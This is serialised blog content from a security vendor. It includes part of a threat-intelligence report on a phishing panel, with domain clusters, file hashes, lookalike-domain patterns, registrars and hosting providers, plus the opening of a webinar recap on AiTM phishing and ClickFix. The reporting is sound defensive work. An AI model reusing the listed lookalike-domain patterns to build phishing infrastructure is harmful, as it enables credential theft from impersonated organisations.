Patterns",{"data":11683,"content":11684,"nodeType":8766},{},[11685,11692,11699,11706,11713],{"data":11686,"content":11687,"nodeType":879},{},[11688],{"data":11689,"marks":11690,"value":11691,"nodeType":883},{},[],"\u003Ctarget>internal.com\n\u003Ctarget>sso.com",{"data":11693,"content":11694,"nodeType":879},{},[11695],{"data":11696,"marks":11697,"value":11698,"nodeType":883},{},[],"my\u003Ctarget>.com",{"data":11700,"content":11701,"nodeType":879},{},[11702],{"data":11703,"marks":11704,"value":11705,"nodeType":883},{},[],"my\u003Ctarget>internal.com",{"data":11707,"content":11708,"nodeType":879},{},[11709],{"data":11710,"marks":11711,"value":11712,"nodeType":883},{},[],"my\u003Ctarget>manager.com",{"data":11714,"content":11715,"nodeType":879},{},[11716],{"data":11717,"marks":11718,"value":11719,"nodeType":883},{},[],"my\u003Ctarget>sso.com",{"data":11721,"content":11722,"nodeType":8752},{},[11723,11733],{"data":11724,"content":11725,"nodeType":8766},{},[11726],{"data":11727,"content":11728,"nodeType":879},{},[11729],{"data":11730,"marks":11731,"value":11732,"nodeType":883},{},[],"Examples",{"data":11734,"content":11735,"nodeType":8766},{},[11736,11743,11750,11757],{"data":11737,"content":11738,"nodeType":879},{},[11739],{"data":11740,"marks":11741,"value":11742,"nodeType":883},{},[],"mydropboxinternal.com (November 2025)",{"data":11744,"content":11745,"nodeType":879},{},[11746],{"data":11747,"marks":11748,"value":11749,"nodeType":883},{},[],"myxerointernal.com (December 2025)",{"data":11751,"content":11752,"nodeType":879},{},[11753],{"data":11754,"marks":11755,"value":11756,"nodeType":883},{},[],"amazoninternal.com (March 2026)",{"data":11758,"content":11759,"nodeType":879},{},[11760],{"data":11761,"marks":11762,"value":11763,"nodeType":883},{},[],"mydisneysso.com (March 2026)",{"data":11765,"content":11766,"nodeType":8752},{},[11767,11777],{"data":11768,"content":11769,"nodeType":8766},{},[11770],{"data":11771,"content":11772,"nodeType":879},{},[11773],{"data":11774,"marks":11775,"value":11776,"nodeType":883},{},[],"Registrar",{"data":11778,"content":11779,"nodeType":8766},{},[11780],{"data":11781,"content":11782,"nodeType":879},{},[11783],{"data":11784,"marks":11785,"value":11786,"nodeType":883},{},[],"NiceNIC",{"data":11788,"content":11789,"nodeType":8752},{},[11790,11800],{"data":11791,"content":11792,"nodeType":8766},{},[11793],{"data":11794,"content":11795,"nodeType":879},{},[11796],{"data":11797,"marks":11798,"value":11799,"nodeType":883},{},[],"Name Servers",{"data":11801,"content":11802,"nodeType":8766},{},[11803],{"data":11804,"content":11805,"nodeType":879},{},[11806],{"data":11807,"marks":11808,"value":11809,"nodeType":883},{},[],"1984.is FreeDNS",{"data":11811,"content":11812,"nodeType":8752},{},[11813,11823],{"data":11814,"content":11815,"nodeType":8766},{},[11816],{"data":11817,"content":11818,"nodeType":879},{},[11819],{"data":11820,"marks":11821,"value":11822,"nodeType":883},{},[],"Hosting Provider",{"data":11824,"content":11825,"nodeType":8766},{},[11826],{"data":11827,"content":11828,"nodeType":879},{},[11829],{"data":11830,"marks":11831,"value":11832,"nodeType":883},{},[],"Mevspace (AS201814)",{"data":11834,"content":11835,"nodeType":1036},{},[11836],{"data":11837,"marks":11838,"value":11839,"nodeType":883},{},[],"Cluster B",{"data":11841,"content":11842,"nodeType":879},{},[11843,11847,11855,11858,11867],{"data":11844,"marks":11845,"value":11846,"nodeType":883},{},[],"The indicators for Cluster B overlap with ",{"data":11848,"content":11849,"nodeType":940},{"uri":2100},[11850],{"data":11851,"marks":11852,"value":11854,"nodeType":883},{},[11853],{"type":948},"Mandiant’s reporting on UNC6671",{"data":11856,"marks":11857,"value":6141,"nodeType":883},{},[],{"data":11859,"content":11861,"nodeType":940},{"uri":11860},"https:\u002F\u002Frhisac.org\u002Fthreat-intelligence\u002Fextortion-in-the-enterprise-defending-against-blackfile-attacks\u002F",[11862],{"data":11863,"marks":11864,"value":11866,"nodeType":883},{},[11865],{"type":948},"Other external reporting",{"data":11868,"marks":11869,"value":11870,"nodeType":883},{},[]," has linked this group to BlackFile-branded extortion and leaks.",{"data":11872,"content":11873,"nodeType":8845},{},[11874,11897,11940,11962,11997,12040,12062,12084],{"data":11875,"content":11876,"nodeType":8752},{},[11877,11887],{"data":11878,"content":11879,"nodeType":8766},{},[11880],{"data":11881,"content":11882,"nodeType":879},{},[11883],{"data":11884,"marks":11885,"value":11606,"nodeType":883},{},[11886],{"type":916},{"data":11888,"content":11889,"nodeType":8766},{},[11890],{"data":11891,"content":11892,"nodeType":879},{},[11893],{"data":11894,"marks":11895,"value":11230,"nodeType":883},{},[11896],{"type":916},{"data":11898,"content":11899,"nodeType":8752},{},[11900,11909],{"data":11901,"content":11902,"nodeType":8766},{},[11903],{"data":11904,"content":11905,"nodeType":879},{},[11906],{"data":11907,"marks":11908,"value":11132,"nodeType":883},{},[],{"data":11910,"content":11911,"nodeType":8766},{},[11912,11919,11926,11933],{"data":11913,"content":11914,"nodeType":879},{},[11915],{"data":11916,"marks":11917,"value":11918,"nodeType":883},{},[],"c0df36ccf88d5c8434b13b58f7a55a9715643a126148b9d078a93075d09cad26",{"data":11920,"content":11921,"nodeType":879},{},[11922],{"data":11923,"marks":11924,"value":11925,"nodeType":883},{},[],"d178dc7108fa9344dae28e350e810352e9e874563496dc7876ee628b11b0eabb",{"data":11927,"content":11928,"nodeType":879},{},[11929],{"data":11930,"marks":11931,"value":11932,"nodeType":883},{},[],"9c0939960e49122196e44b6779fe55dd7a13ab437ce251c8cf35f8c6daf8be21",{"data":11934,"content":11935,"nodeType":879},{},[11936],{"data":11937,"marks":11938,"value":11939,"nodeType":883},{},[],"e8128b33259f7ea4313c942689ba0ba557f17b1474f2e621c62a5b77674fab86",{"data":11941,"content":11942,"nodeType":8752},{},[11943,11952],{"data":11944,"content":11945,"nodeType":8766},{},[11946],{"data":11947,"content":11948,"nodeType":879},{},[11949],{"data":11950,"marks":11951,"value":11658,"nodeType":883},{},[],{"data":11953,"content":11954,"nodeType":8766},{},[11955],{"data":11956,"content":11957,"nodeType":879},{},[11958],{"data":11959,"marks":11960,"value":11961,"nodeType":883},{},[],"January 2026",{"data":11963,"content":11964,"nodeType":8752},{},[11965,11974],{"data":11966,"content":11967,"nodeType":8766},{},[11968],{"data":11969,"content":11970,"nodeType":879},{},[11971],{"data":11972,"marks":11973,"value":11681,"nodeType":883},{},[],{"data":11975,"content":11976,"nodeType":8766},{},[11977,11984,11991],{"data":11978,"content":11979,"nodeType":879},{},[11980],{"data":11981,"marks":11982,"value":11983,"nodeType":883},{},[],"\u003Ctarget>internal.com",{"data":11985,"content":11986,"nodeType":879},{},[11987],{"data":11988,"marks":11989,"value":11990,"nodeType":883},{},[],"\u003Ctarget>sso.com",{"data":11992,"content":11993,"nodeType":879},{},[11994],{"data":11995,"marks":11996,"value":11719,"nodeType":883},{},[],{"data":11998,"content":11999,"nodeType":8752},{},[12000,12009],{"data":12001,"content":12002,"nodeType":8766},{},[12003],{"data":12004,"content":12005,"nodeType":879},{},[12006],{"data":12007,"marks":12008,"value":11732,"nodeType":883},{},[],{"data":12010,"content":12011,"nodeType":8766},{},[12012,12019,12026,12033],{"data":12013,"content":12014,"nodeType":879},{},[12015],{"data":12016,"marks":12017,"value":12018,"nodeType":883},{},[],"epicgamessso[.]com (December 2025)",{"data":12020,"content":12021,"nodeType":879},{},[12022],{"data":12023,"marks":12024,"value":12025,"nodeType":883},{},[],"myadyeninternal[.]com (January 2026)",{"data":12027,"content":12028,"nodeType":879},{},[12029],{"data":12030,"marks":12031,"value":12032,"nodeType":883},{},[],"mysonossso[.]com (January 2026)",{"data":12034,"content":12035,"nodeType":879},{},[12036],{"data":12037,"marks":12038,"value":12039,"nodeType":883},{},[],"sonosinternal[.]com (January 2026)",{"data":12041,"content":12042,"nodeType":8752},{},[12043,12052],{"data":12044,"content":12045,"nodeType":8766},{},[12046],{"data":12047,"content":12048,"nodeType":879},{},[12049],{"data":12050,"marks":12051,"value":11776,"nodeType":883},{},[],{"data":12053,"content":12054,"nodeType":8766},{},[12055],{"data":12056,"content":12057,"nodeType":879},{},[12058],{"data":12059,"marks":12060,"value":12061,"nodeType":883},{},[],"Tucows",{"data":12063,"content":12064,"nodeType":8752},{},[12065,12074],{"data":12066,"content":12067,"nodeType":8766},{},[12068],{"data":12069,"content":12070,"nodeType":879},{},[12071],{"data":12072,"marks":12073,"value":11799,"nodeType":883},{},[],{"data":12075,"content":12076,"nodeType":8766},{},[12077],{"data":12078,"content":12079,"nodeType":879},{},[12080],{"data":12081,"marks":12082,"value":12083,"nodeType":883},{},[],"Njalla",{"data":12085,"content":12086,"nodeType":8752},{},[12087,12096],{"data":12088,"content":12089,"nodeType":8766},{},[12090],{"data":12091,"content":12092,"nodeType":879},{},[12093],{"data":12094,"marks":12095,"value":11822,"nodeType":883},{},[],{"data":12097,"content":12098,"nodeType":8766},{},[12099],{"data":12100,"content":12101,"nodeType":879},{},[12102],{"data":12103,"marks":12104,"value":12105,"nodeType":883},{},[],"Njalla (AS39287)",{"data":12107,"content":12108,"nodeType":1036},{},[12109],{"data":12110,"marks":12111,"value":12112,"nodeType":883},{},[],"Cluster C",{"data":12114,"content":12115,"nodeType":879},{},[12116],{"data":12117,"marks":12118,"value":12119,"nodeType":883},{},[],"Cluster C is likely an evolution of Cluster B. Some evidence has been observed tying the backend hosting to Njalla behind the Cloudflare CDN further solidifying the link. The shift to Cloudflare Turnstile protection and subdomain-based targeting represents an operational refinement — moving away from the distinctive [target]internal[.]com pattern that had become a well-known campaign indicator.",{"data":12121,"content":12122,"nodeType":8845},{},[12123,12147,12169,12191,12213,12256,12277,12299],{"data":12124,"content":12125,"nodeType":8752},{},[12126,12136],{"data":12127,"content":12128,"nodeType":8766},{},[12129],{"data":12130,"content":12131,"nodeType":879},{},[12132],{"data":12133,"marks":12134,"value":11606,"nodeType":883},{},[12135],{"type":916},{"data":12137,"content":12138,"nodeType":8766},{},[12139],{"data":12140,"content":12141,"nodeType":879},{},[12142],{"data":12143,"marks":12144,"value":12146,"nodeType":883},{},[12145],{"type":916},"heartbeat\u002Fcheck_redirect variant protected with Cloudflare turnstile",{"data":12148,"content":12149,"nodeType":8752},{},[12150,12159],{"data":12151,"content":12152,"nodeType":8766},{},[12153],{"data":12154,"content":12155,"nodeType":879},{},[12156],{"data":12157,"marks":12158,"value":11132,"nodeType":883},{},[],{"data":12160,"content":12161,"nodeType":8766},{},[12162],{"data":12163,"content":12164,"nodeType":879},{},[12165],{"data":12166,"marks":12167,"value":12168,"nodeType":883},{},[],"cb1d409278b2247af23e7b00ac779b232baaf4ce5f63fdf5ebc3920a38cc6102",{"data":12170,"content":12171,"nodeType":8752},{},[12172,12181],{"data":12173,"content":12174,"nodeType":8766},{},[12175],{"data":12176,"content":12177,"nodeType":879},{},[12178],{"data":12179,"marks":12180,"value":11658,"nodeType":883},{},[],{"data":12182,"content":12183,"nodeType":8766},{},[12184],{"data":12185,"content":12186,"nodeType":879},{},[12187],{"data":12188,"marks":12189,"value":12190,"nodeType":883},{},[],"March 2026 - present (April 2026)",{"data":12192,"content":12193,"nodeType":8752},{},[12194,12203],{"data":12195,"content":12196,"nodeType":8766},{},[12197],{"data":12198,"content":12199,"nodeType":879},{},[12200],{"data":12201,"marks":12202,"value":11681,"nodeType":883},{},[],{"data":12204,"content":12205,"nodeType":8766},{},[12206],{"data":12207,"content":12208,"nodeType":879},{},[12209],{"data":12210,"marks":12211,"value":12212,"nodeType":883},{},[],"\u003Ctarget> subdomain with generic “sso”, “passkey”, “enroll”, “okta” theme root domain",{"data":12214,"content":12215,"nodeType":8752},{},[12216,12225],{"data":12217,"content":12218,"nodeType":8766},{},[12219],{"data":12220,"content":12221,"nodeType":879},{},[12222],{"data":12223,"marks":12224,"value":11732,"nodeType":883},{},[],{"data":12226,"content":12227,"nodeType":8766},{},[12228,12235,12242,12249],{"data":12229,"content":12230,"nodeType":879},{},[12231],{"data":12232,"marks":12233,"value":12234,"nodeType":883},{},[],"\u003Ctarget>.passkeysetup.com (March 2026)",{"data":12236,"content":12237,"nodeType":879},{},[12238],{"data":12239,"marks":12240,"value":12241,"nodeType":883},{},[],"\u003Ctarget>.enrollms.com (March 2026)",{"data":12243,"content":12244,"nodeType":879},{},[12245],{"data":12246,"marks":12247,"value":12248,"nodeType":883},{},[],"\u003Ctarget>.keyokta.com (April 2026)",{"data":12250,"content":12251,"nodeType":879},{},[12252],{"data":12253,"marks":12254,"value":12255,"nodeType":883},{},[],"\u003Ctarget>.passkeywork.com (April 2026)",{"data":12257,"content":12258,"nodeType":8752},{},[12259,12268],{"data":12260,"content":12261,"nodeType":8766},{},[12262],{"data":12263,"content":12264,"nodeType":879},{},[12265],{"data":12266,"marks":12267,"value":11776,"nodeType":883},{},[],{"data":12269,"content":12270,"nodeType":8766},{},[12271],{"data":12272,"content":12273,"nodeType":879},{},[12274],{"data":12275,"marks":12276,"value":12061,"nodeType":883},{},[],{"data":12278,"content":12279,"nodeType":8752},{},[12280,12289],{"data":12281,"content":12282,"nodeType":8766},{},[12283],{"data":12284,"content":12285,"nodeType":879},{},[12286],{"data":12287,"marks":12288,"value":11799,"nodeType":883},{},[],{"data":12290,"content":12291,"nodeType":8766},{},[12292],{"data":12293,"content":12294,"nodeType":879},{},[12295],{"data":12296,"marks":12297,"value":12298,"nodeType":883},{},[],"Cloudflare",{"data":12300,"content":12301,"nodeType":8752},{},[12302,12311],{"data":12303,"content":12304,"nodeType":8766},{},[12305],{"data":12306,"content":12307,"nodeType":879},{},[12308],{"data":12309,"marks":12310,"value":11822,"nodeType":883},{},[],{"data":12312,"content":12313,"nodeType":8766},{},[12314],{"data":12315,"content":12316,"nodeType":879},{},[12317],{"data":12318,"marks":12319,"value":12320,"nodeType":883},{},[],"Cloudflare (AS13335)",{"data":12322,"content":12323,"nodeType":1036},{},[12324],{"data":12325,"marks":12326,"value":12327,"nodeType":883},{},[],"Cluster D",{"data":12329,"content":12330,"nodeType":8845},{},[12331,12355,12377,12399,12421,12450,12471,12492],{"data":12332,"content":12333,"nodeType":8752},{},[12334,12344],{"data":12335,"content":12336,"nodeType":8766},{},[12337],{"data":12338,"content":12339,"nodeType":879},{},[12340],{"data":12341,"marks":12342,"value":11606,"nodeType":883},{},[12343],{"type":916},{"data":12345,"content":12346,"nodeType":8766},{},[12347],{"data":12348,"content":12349,"nodeType":879},{},[12350],{"data":12351,"marks":12352,"value":12354,"nodeType":883},{},[12353],{"type":916},"heartbeat\u002Fcheck_redirect variant (minified)",{"data":12356,"content":12357,"nodeType":8752},{},[12358,12367],{"data":12359,"content":12360,"nodeType":8766},{},[12361],{"data":12362,"content":12363,"nodeType":879},{},[12364],{"data":12365,"marks":12366,"value":11132,"nodeType":883},{},[],{"data":12368,"content":12369,"nodeType":8766},{},[12370],{"data":12371,"content":12372,"nodeType":879},{},[12373],{"data":12374,"marks":12375,"value":12376,"nodeType":883},{},[],"9d65dd34384b441505e6b67647153c02d5c367bb53da36ce36a392e70b37940a",{"data":12378,"content":12379,"nodeType":8752},{},[12380,12389],{"data":12381,"content":12382,"nodeType":8766},{},[12383],{"data":12384,"content":12385,"nodeType":879},{},[12386],{"data":12387,"marks":12388,"value":11658,"nodeType":883},{},[],{"data":12390,"content":12391,"nodeType":8766},{},[12392],{"data":12393,"content":12394,"nodeType":879},{},[12395],{"data":12396,"marks":12397,"value":12398,"nodeType":883},{},[],"April 2026 (low volume)",{"data":12400,"content":12401,"nodeType":8752},{},[12402,12411],{"data":12403,"content":12404,"nodeType":8766},{},[12405],{"data":12406,"content":12407,"nodeType":879},{},[12408],{"data":12409,"marks":12410,"value":11681,"nodeType":883},{},[],{"data":12412,"content":12413,"nodeType":8766},{},[12414],{"data":12415,"content":12416,"nodeType":879},{},[12417],{"data":12418,"marks":12419,"value":12420,"nodeType":883},{},[],"\u003Ctarget> subdomain with generic “passkey”, “portal”, “okta” theme root domain",{"data":12422,"content":12423,"nodeType":8752},{},[12424,12433],{"data":12425,"content":12426,"nodeType":8766},{},[12427],{"data":12428,"content":12429,"nodeType":879},{},[12430],{"data":12431,"marks":12432,"value":11732,"nodeType":883},{},[],{"data":12434,"content":12435,"nodeType":8766},{},[12436,12443],{"data":12437,"content":12438,"nodeType":879},{},[12439],{"data":12440,"marks":12441,"value":12442,"nodeType":883},{},[],"\u003Ctarget>.passkeyportalsetup.com",{"data":12444,"content":12445,"nodeType":879},{},[12446],{"data":12447,"marks":12448,"value":12449,"nodeType":883},{},[],"\u003Ctarget>.addoktapasskey.com",{"data":12451,"content":12452,"nodeType":8752},{},[12453,12462],{"data":12454,"content":12455,"nodeType":8766},{},[12456],{"data":12457,"content":12458,"nodeType":879},{},[12459],{"data":12460,"marks":12461,"value":11776,"nodeType":883},{},[],{"data":12463,"content":12464,"nodeType":8766},{},[12465],{"data":12466,"content":12467,"nodeType":879},{},[12468],{"data":12469,"marks":12470,"value":11786,"nodeType":883},{},[],{"data":12472,"content":12473,"nodeType":8752},{},[12474,12483],{"data":12475,"content":12476,"nodeType":8766},{},[12477],{"data":12478,"content":12479,"nodeType":879},{},[12480],{"data":12481,"marks":12482,"value":11799,"nodeType":883},{},[],{"data":12484,"content":12485,"nodeType":8766},{},[12486],{"data":12487,"content":12488,"nodeType":879},{},[12489],{"data":12490,"marks":12491,"value":12298,"nodeType":883},{},[],{"data":12493,"content":12494,"nodeType":8752},{},[12495,12504],{"data":12496,"content":12497,"nodeType":8766},{},[12498],{"data":12499,"content":12500,"nodeType":879},{},[12501],{"data":12502,"marks":12503,"value":11822,"nodeType":883},{},[],{"data":12505,"content":12506,"nodeType":8766},{},[12507],{"data":12508,"content":12509,"nodeType":879},{},[12510],{"data":12511,"marks":12512,"value":12320,"nodeType":883},{},[],{"data":12514,"content":12515,"nodeType":905},{},[],{"data":12517,"content":12518,"nodeType":909},{},[12519],{"data":12520,"marks":12521,"value":12523,"nodeType":883},{},[12522],{"type":916},"Detection considerations",{"data":12525,"content":12526,"nodeType":879},{},[12527],{"data":12528,"marks":12529,"value":12530,"nodeType":883},{},[],"For Push, the detection approach to these panels is fundamentally the same as for any other phishing kit — behavioral analysis of the rendered page in the browser, regardless of the C2 protocol running underneath. ",{"data":12532,"content":12533,"nodeType":879},{},[12534],{"data":12535,"marks":12536,"value":12537,"nodeType":883},{},[],"The main operational difference is on the operator end, where the human-in-the-loop interaction replaces fully automated credential harvesting. This has implications for defenders relying on proactive infrastructure scanning: the gated landing pages, anti-bot checks, and operator-approval requirements mean the malicious content is only served to active targets, making it significantly harder for automated scanners to discover and flag these domains before they're used against a victim.",{"data":12539,"content":12540,"nodeType":879},{},[12541,12546],{"data":12542,"marks":12543,"value":12545,"nodeType":883},{},[12544],{"type":916},"The phone call as delivery vector eliminates the email-based detection surface that most organizations rely on as their primary phishing defense. ",{"data":12547,"marks":12548,"value":12549,"nodeType":883},{},[],"Operator-gated payload delivery further reduces the likelihood that these sites will be flagged as malicious and added to known-bad detection lists (and in any case, it’s trivial for attackers to spin up new ones). This reinforces the need for browser-based detection at the point the user interacts with the page, analyzing it in real time for malicious content without relying on static IoCs. ",{"data":12551,"content":12552,"nodeType":905},{},[],{"data":12554,"content":12555,"nodeType":909},{},[12556],{"data":12557,"marks":12558,"value":8696,"nodeType":883},{},[12559],{"type":916},{"data":12561,"content":12562,"nodeType":879},{},[12563,12567,12573],{"data":12564,"marks":12565,"value":12566,"nodeType":883},{},[],"Short-lived IoCs are of limited value when tackling modern phishing attacks due to the rate at which attackers are able to ",{"data":12568,"content":12569,"nodeType":940},{"uri":8706},[12570],{"data":12571,"marks":12572,"value":8711,"nodeType":883},{},[],{"data":12574,"marks":12575,"value":12576,"nodeType":883},{},[]," in the attack chain, often dynamically serving different URLs to site visitors. ",{"data":12578,"content":12579,"nodeType":879},{},[12580,12583,12591],{"data":12581,"marks":12582,"value":21,"nodeType":883},{},[],{"data":12584,"content":12586,"nodeType":940},{"uri":12585},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Fcollection\u002F0f745e9da6ef7664444594a7ee930cfe5a9d8bd6c2f039dcde818599b8926610",[12587],{"data":12588,"marks":12589,"value":12590,"nodeType":883},{},[],"The full list of IoCs is on VirusTotal here. ",{"data":12592,"marks":12593,"value":21,"nodeType":883},{},[],{"data":12595,"content":12596,"nodeType":879},{},[12597],{"data":12598,"marks":12599,"value":8654,"nodeType":883},{},[12600],{"type":916},{"data":12602,"content":12603,"nodeType":905},{},[],{"data":12605,"content":12606,"nodeType":909},{},[12607],{"data":12608,"marks":12609,"value":12611,"nodeType":883},{},[12610],{"type":916},"Learn more about Push",{"data":12613,"content":12614,"nodeType":879},{},[12615,12619,12625],{"data":12616,"marks":12617,"value":12618,"nodeType":883},{},[],"Push Security is the most powerful AI-native security tool in the browser. Think EDR, but for the browser — high-fidelity telemetry and real-time control across every session, on every device, with no browser migration required.\n\nSecurity teams use Push to detect and stop advanced browser-based attacks like AiTM phishing, ClickFix, and session hijacking; gain visibility and control over AI tool usage across their workforce; harden identities by surfacing credential reuse, SSO gaps, and shadow IT; and support data loss and insider investigations with browser-layer telemetry that other tools can't see.\n\nBook a ",{"data":12620,"content":12621,"nodeType":940},{"uri":4772},[12622],{"data":12623,"marks":12624,"value":6679,"nodeType":883},{},[],{"data":12626,"marks":12627,"value":6683,"nodeType":883},{},[],"We infiltrated a criminal phishing panel: here’s what we found","We got an inside look at a phishing panel used in criminal campaigns linked to operators like ShinyHunters and BlackFile. Here’s what we found.","2026-05-07T00:00:00.000Z","inside-criminal-phishing-panel",{"items":12633},[12634,12636],{"sys":12635,"name":3273},{"id":3272},{"sys":12637,"name":343},{"id":3276},{"items":12639},[12640],{"fullName":12641,"firstName":12642,"jobTitle":868,"profilePicture":12643},"Push Security Research Team","Research",{"url":12644},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F7LpkwyXbOZ8WCVTAXzULmC\u002Fbfa3634c78ee9dfbee6606ba5519918b\u002Fpush-round.png","llmshare-malvertising-campaign","blog\u002Fllmshare-malvertising-campaign",{"json":12648},{"data":12649,"content":12650,"nodeType":875},{},[12651],{"data":12652,"content":12653,"nodeType":879},{},[12654],{"data":12655,"marks":12656,"value":12657,"nodeType":883},{},[],"Attackers are abusing the shared content features of AI chatbot platforms — ChatGPT and Claude — to deliver malware through pages hosted on legitimate, trusted domains, distributing the malicious links via sponsored malvertising ads on search engines. ","How attackers are using shared content features on AI chatbot platforms to deliver malware via pages hosted on legitimate domains, sent via malvertising.",{"id":12660,"publishedAt":12661},"Gcg7PGuICrlRcqq1QFXxH","2026-08-12T12:00:49.899Z",{"items":12663},[12664,12666],{"sys":12665,"name":3273},{"id":3272},{"sys":12667,"name":343},{"id":3276},{"items":12669},[12670,12672,12674,12676,12678,12680,12682,12684,12686,12688,12690,12692],{"sys":12671,"name":280,"slug":281,"tier":31},{"id":277},{"sys":12673,"name":235,"slug":236,"tier":31},{"id":232},{"sys":12675,"name":521,"slug":522,"tier":31},{"id":518},{"sys":12677,"name":442,"slug":443,"tier":45},{"id":439},{"sys":12679,"name":450,"slug":451,"tier":45},{"id":447},{"sys":12681,"name":316,"slug":317,"tier":45},{"id":313},{"sys":12683,"name":433,"slug":434,"tier":45},{"id":430},{"sys":12685,"name":424,"slug":425,"tier":45},{"id":421},{"sys":12687,"name":244,"slug":245,"tier":45},{"id":241},{"sys":12689,"name":564,"slug":565,"tier":45},{"id":561},{"sys":12691,"name":607,"slug":608,"tier":45},{"id":604},{"sys":12693,"name":477,"slug":478,"tier":45},{"id":474},"IqK0SBDuAwVjeXZ7slErmV4yVzN_7gBWkRubjc6cQw4",{"id":12696,"title":12697,"authorsCollection":12698,"content":12706,"extension":228,"faqItemsCollection":13302,"faqTitle":59,"featured":6,"hashTags":59,"meta":13304,"metaTitle":13305,"ogImage":59,"postType":1962,"publishedDate":13306,"relatedBlogPostsCollection":13307,"slug":18008,"stem":18009,"subtitle":59,"summary":18010,"synopsis":18021,"sys":18022,"tagsCollection":18025,"topicsCollection":18031,"__hash__":18077},"blog\u002Fblog\u002F7-things-we-learned-from-john-hammond.json","7 things we learned from ‘Why the browser is the new battleground’ with John Hammond",{"items":12699},[12700],{"fullName":12701,"firstName":12702,"jobTitle":12703,"socialLinks":59,"profilePicture":12704},"Daniel Park","Daniel","Technical Content",{"url":12705},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F6Cwg1xVeCdzUvxBIMfnDO5\u002F6b18ed126b53611e7b521da34f900d29\u002F254-0-2.jpg",{"json":12707,"links":13290},{"data":12708,"content":12709,"nodeType":875},{},[12710,12730,12736,12739,12747,12798,12808,12811,12819,12838,12845,12868,12887,12890,12898,12917,12924,12931,12941,12944,12952,12984,13002,13005,13013,13030,13037,13044,13047,13055,13072,13079,13097,13107,13114,13117,13125,13141,13148,13155,13167,13177,13195,13198,13206,13213,13261],{"data":12711,"content":12712,"nodeType":879},{},[12713,12717,12726],{"data":12714,"marks":12715,"value":12716,"nodeType":883},{},[],"We recently sat down with ",{"data":12718,"content":12720,"nodeType":940},{"uri":12719},"https:\u002F\u002Fwww.youtube.com\u002F@_JohnHammond",[12721],{"data":12722,"marks":12723,"value":12725,"nodeType":883},{},[12724],{"type":948},"John Hammond",{"data":12727,"marks":12728,"value":12729,"nodeType":883},{},[]," — Senior Principal Security Researcher at Huntress — for a live deep-dive into the browser-based attack techniques defining the 2026 threat landscape. The session covered AiTM phishing, ClickFix, ConsentFix, device code phishing, and the structural shifts making traditional security controls less effective against all of them. Here are seven takeaways.",{"data":12731,"content":12735,"nodeType":971},{"target":12732},{"sys":12733},{"id":12734,"type":976,"linkType":977},"5lJ49aLY0nApDeY69tNvUi",[],{"data":12737,"content":12738,"nodeType":905},{},[],{"data":12740,"content":12741,"nodeType":909},{},[12742],{"data":12743,"marks":12744,"value":12746,"nodeType":883},{},[12745],{"type":916},"1. Browser attacks are evolving faster than defenses can adapt",{"data":12748,"content":12749,"nodeType":879},{},[12750,12754,12761,12765,12773,12777,12784,12788,12795],{"data":12751,"marks":12752,"value":12753,"nodeType":883},{},[],"The overriding theme of the session wasn't any single technique — it was the pace of change across all of them. AiTM phishing has been ",{"data":12755,"content":12756,"nodeType":940},{"uri":7300},[12757],{"data":12758,"marks":12759,"value":12760,"nodeType":883},{},[],"the dominant phishing technique",{"data":12762,"marks":12763,"value":12764,"nodeType":883},{},[]," for a couple of years now, but the variants layered on top of it are arriving faster than most security teams can evaluate, let alone deploy defenses against. ClickFix went from novel to ",{"data":12766,"content":12768,"nodeType":940},{"uri":12767},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fintroducing-the-browser-and-identity-attacks-matrix\u002F",[12769],{"data":12770,"marks":12771,"value":12772,"nodeType":883},{},[],"the most common initial access vector observed by Microsoft",{"data":12774,"marks":12775,"value":12776,"nodeType":883},{},[]," within about a year. Device code phishing went from near-zero to ",{"data":12778,"content":12779,"nodeType":940},{"uri":2443},[12780],{"data":12781,"marks":12782,"value":12783,"nodeType":883},{},[],"at least 12 distinct kits",{"data":12785,"marks":12786,"value":12787,"nodeType":883},{},[]," in a matter of months. ConsentFix was detected as a zero-day technique by Push in late 2025 and has already been ",{"data":12789,"content":12790,"nodeType":940},{"uri":1343},[12791],{"data":12792,"marks":12793,"value":12794,"nodeType":883},{},[],"operationalized on criminal forums",{"data":12796,"marks":12797,"value":1350,"nodeType":883},{},[],{"data":12799,"content":12800,"nodeType":4197},{},[12801],{"data":12802,"content":12803,"nodeType":879},{},[12804],{"data":12805,"marks":12806,"value":12807,"nodeType":883},{},[],"As Luke put it toward the end of the session: \"I've seen this develop so fast over the last two years. This isn't what's coming — this is now. This is where the battleground is.\"",{"data":12809,"content":12810,"nodeType":905},{},[],{"data":12812,"content":12813,"nodeType":909},{},[12814],{"data":12815,"marks":12816,"value":12818,"nodeType":883},{},[12817],{"type":916},"2. AiTM phishing is table stakes for attackers ",{"data":12820,"content":12821,"nodeType":879},{},[12822,12826,12834],{"data":12823,"marks":12824,"value":12825,"nodeType":883},{},[],"Adversary-in-the-middle phishing — where a reverse proxy sits between the victim and the real login page, intercepting session tokens in real time to bypass MFA — is no longer an advanced technique. It's available as a commodity for-hire through Phishing-as-a-Service platforms like Tycoon2FA, Sneaky2FA, and others",{"data":12827,"content":12828,"nodeType":940},{"uri":7300},[12829],{"data":12830,"marks":12831,"value":12833,"nodeType":883},{},[12832],{"type":948},",",{"data":12835,"marks":12836,"value":12837,"nodeType":883},{},[]," and the kits are getting harder to detect through traditional means.",{"data":12839,"content":12840,"nodeType":879},{},[12841],{"data":12842,"marks":12843,"value":12844,"nodeType":883},{},[],"Luke demoed the attacker's perspective using Evilginx — an open-source tool now commonly seen in criminal operations — showing how session tokens are captured in real time even when the victim enters their MFA code correctly. From the victim's side, the login feels completely normal.",{"data":12846,"content":12847,"nodeType":879},{},[12848,12853,12857,12865],{"data":12849,"marks":12850,"value":12852,"nodeType":883},{},[12851],{"type":916},"One of the key focuses in the session was how attackers are abusing legitimate infrastructure for both hosting and delivery of phishing pages. .",{"data":12854,"marks":12855,"value":12856,"nodeType":883},{},[]," The in-the-wild examples showed attack chains routing through multiple legitimate services — file-sharing platforms, TinyURL, Cloudflare Turnstile, Google Search redirects — before finally landing on the phishing page. This is a well established technique for ",{"data":12858,"content":12859,"nodeType":940},{"uri":8582},[12860],{"data":12861,"marks":12862,"value":12864,"nodeType":883},{},[12863],{"type":948},"detection evasion",{"data":12866,"marks":12867,"value":3386,"nodeType":883},{},[],{"data":12869,"content":12870,"nodeType":879},{},[12871,12875,12883],{"data":12872,"marks":12873,"value":12874,"nodeType":883},{},[],"As John observed, \"the end user doesn't have that wherewithal or that observability understanding of how far they drove around across the 